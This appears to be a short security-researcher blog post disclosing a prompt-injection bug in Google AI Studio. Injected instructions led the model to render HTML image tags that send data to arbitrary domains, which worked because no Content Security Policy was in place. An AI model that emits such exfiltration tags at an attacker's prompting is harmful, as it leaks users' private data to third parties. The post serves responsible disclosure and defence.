Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed.
Recently, I found what appeared to be a regression or bypass that again allowed data exfiltration via image rendering during prompt injection. See the previous post here for reference.
Data Exfiltration via Rendering HTML Image TagsDuring re-testing, I had sporadic success with markdown rendering tricks, but eventually, I was able to drastically simplify the exploit by asking directly for an HTML image tag.
This behavior might actually have existed all along, as Google AI Studio hadn’t yet implemented any kind of Content Security Policy to prevent communication with arbitrary domains using images.